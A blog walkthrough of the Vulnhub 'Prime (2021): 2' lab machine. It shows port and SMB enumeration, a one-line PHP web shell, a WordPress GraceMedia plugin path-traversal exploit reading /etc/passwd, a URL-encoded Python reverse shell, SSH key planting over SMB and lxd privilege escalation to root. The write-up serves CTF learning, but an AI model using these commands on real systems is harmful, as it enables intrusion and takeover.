Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub Prime (2021): 2 Walkthrough

Vulnhub Prime (2021): 2 Walkthrough

https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

 # Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A


Check smb share folders.

 smbclient -L 192.168.33.139                                                                      fish-0 | 130 [08:45:41]
 Enter WORKGROUP\kali's password:
 
         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available


Found shell.php in /upload.

 smbclient '\\\\192.168.33.139\\welcome'                                                            fish-0 | 1 [08:47:16]
 Enter WORKGROUP\kali's password:
 Try "help" to get a list of possible commands.
 smb: \> dir
   .                                   D        0  Thu May 13 04:27:52 2021
   ..                                  D        0  Sat May  8 02:38:58 2021
   .mysql_history                      H       18  Sat May  8 15:05:03 2021
   .ssh                               DH        0  Thu May 13 04:29:18 2021
   .profile                            H      807  Sat Mar 20 00:02:58 2021
   upload                              D        0  Sun May  9 19:19:02 2021
   .sudo_as_admin_successful           H        0  Sat May  8 13:34:48 2021
   .bash_logout                        H      220  Sat Mar 20 00:02:58 2021
   .cache                             DH        0  Sat May  8 02:39:15 2021
   something                           N       82  Sat May  8 00:18:09 2021
   secrets                             N        0  Sat May  8 00:15:17 2021
   .bash_history                       H       72  Sun May  9 19:23:26 2021
   .bashrc                             H     3771  Sat Mar 20 00:02:58 2021
 
                 19475088 blocks of size 1024. 9885876 blocks available
 smb: \> cd upload
 smb: \upload\> dir
   .                                   D        0  Sun May  9 19:19:02 2021
   ..                                  D        0  Thu May 13 04:27:52 2021
   shell.php                           A       35  Sun May  9 19:19:02 2021
 
                 19475088 blocks of size 1024. 9885872 blocks available
 smb: \upload\> get shell.php
 getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
 smb: \upload\>


Check shell.php.

 cat shell.php                                                                                 smbclient-0 | 0 [08:48:39]
 <?php echo system($_GET['cmd']);?>


Found user name jarves.

 cat something                                                                                      fish-0 | 0 [09:29:34]
 I wanted to make it my home directory. But idea must be changed.
 
 
 Thanks,
 jarves


Scan folders of port 80.

 cat 80.log                                                                                         fish-0 | 0 [09:30:32]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
 /server               (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
 /wp                   (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
 /index.html           (Status: 200) [Size: 5761]
 /images               (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Check vulnerability of wordpress, found 1 user and 1 vulnerable plugin.

 wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
 ...
 [+] gracemedia-media-player
  | Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2013-07-21T15:09:00.000Z
  | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
  |     References:
  |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
  |      - https://www.exploit-db.com/exploits/46537/
  |      - https://seclists.org/fulldisclosure/2019/Mar/26
 ...
 [i] User(s) Identified:
 
 [+] admin
  | Found By: Author Posts - Author Pattern (Passive Detection)
  | Confirmed By:
  |  Rss Generator (Passive Detection)
  |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  |  Login Error Messages (Aggressive Detection)
 


The plugin has LFI vulnerability.

 searchsploit  gracemedia  
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path
 ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion                  | php/webapps/46537.txt
 ------------------------------------------------------------------------------------- ---------------------------------


Check if LFI works.

 curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds
 &cfg=../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
 lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
 ...


Check if LFI works.

 curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 uid=33(www-data) gid=33(www-data) groups=33(www-data)⏎


Visit the following address.

Visit http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Get reverse shell.

 nc -nlvp 1234                                                                                  ifconfig-0 | 0 [08:50:29]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.139.
 Ncat: Connection from 192.168.33.139:49084.
 bash: cannot set terminal process group (971): Inappropriate ioctl for device
 bash: no job control in this shell
 <t/plugins/gracemedia-media-player/templates/files$
 
 <t/plugins/gracemedia-media-player/templates/files$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to directly get ssh login as jarves is to directly upload authorized_keys through smb.

 smbclient '\\\\192.168.33.139\\welcome'
 ...
 smb: \> mkdir .ssh
 smb: \> cd .ssh
 smb: \.ssh\> put authorized_keys
 putting file authorized_keys as \.ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
 smb: \.ssh\> chmod 600 authorized_keys
 Server doesn't support UNIX CIFS calls.


Check group of jarves.

 jarves@hackerctflab:~$ id
 uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
 


Use the classic lxd vulnerability.

 lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz  --alias myimage
 lxd init alpine:v3.12 mypool
 lxc init myimage ignite -c security.privileged=true
 lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
 lxc start ignite


Now we are root.

 jarves@hackerctflab:~$ lxc exec ignite /bin/sh
 ~ # id
 uid=0(root) gid=0(root)


Upload authorized_keys to /root/.ssh, get ssh login directly.

 ssh root@192.168.33.139
 ...
 root@hackerctflab:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hackerctflab


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0